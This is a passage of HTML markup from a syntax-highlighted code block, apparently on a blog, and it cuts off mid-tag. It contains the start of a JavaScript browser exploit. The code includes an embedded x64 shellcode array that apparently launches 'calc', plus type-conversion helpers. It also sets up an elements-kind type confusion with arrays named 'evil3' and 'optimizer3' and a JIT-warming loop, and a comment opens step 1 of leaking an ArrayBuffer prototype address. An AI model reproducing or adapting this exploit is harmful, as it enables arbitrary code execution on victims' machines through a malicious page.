class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-172\">172<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-1\"><span 
class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-3\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0xe48348fc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00c0e8f0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x51410000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x51525041<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd2314856<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4865<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4860<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4818<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x728b4820<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xb70f4850<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x314d4a4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc03148c9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x7c613cac<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41202c02<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x410dc9c1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xede2c101<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x48514152<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b20528b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x01483c42<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-cn\">0x88808bd0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x48000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x6774c085<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x50d00148<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4418488b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4920408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x56e3d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41c9ff48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4888348b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x314dd601<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc03148c9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc9c141ac<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc101410d<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xf175e038<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x244c034c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd1394508<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4458d875<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4924408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4166d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x44480c8b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x491c408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b41d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x01488804<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x415841d0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5a595e58<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-cn\">0x59415841<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x83485a41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x524120ec<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4158e0ff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b485a59<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xff57e912<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x485dffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x000001ba<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8d8d4800<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00000101<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b31ba41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd5ff876f<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xa2b5f0bb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xa6ba4156<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xff9dbd95<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc48348d5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x7c063c28<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xe0fb800a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x47bb0575<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x6a6f7213<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x89415900<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x63d5ffda<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00636c61<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-4\"><span 
class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-6\"><span class=\"crayon-v\">flag<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-7\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5994c4d8266a7993443183-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-12\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">num1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">num2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">buffer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-18\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-19\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">num<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-20\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">buffer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-24\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-25\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">floatarr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">floatarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">j<\/span><span 
class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-32\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-33\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-34\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-35\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-36\"><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-37\"><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-38\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-39\"><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-40\"><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-41\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-42\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-43\"><span 
class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-45\"><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-46\"><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-47\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span 
class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-48\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-49\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-51\"><span class=\"crayon-c\">\/******************************* step 1&nbsp;&nbsp;&nbsp;&nbsp;read ArrayBuffer __proto__ address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-52\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-53\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">arguments<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 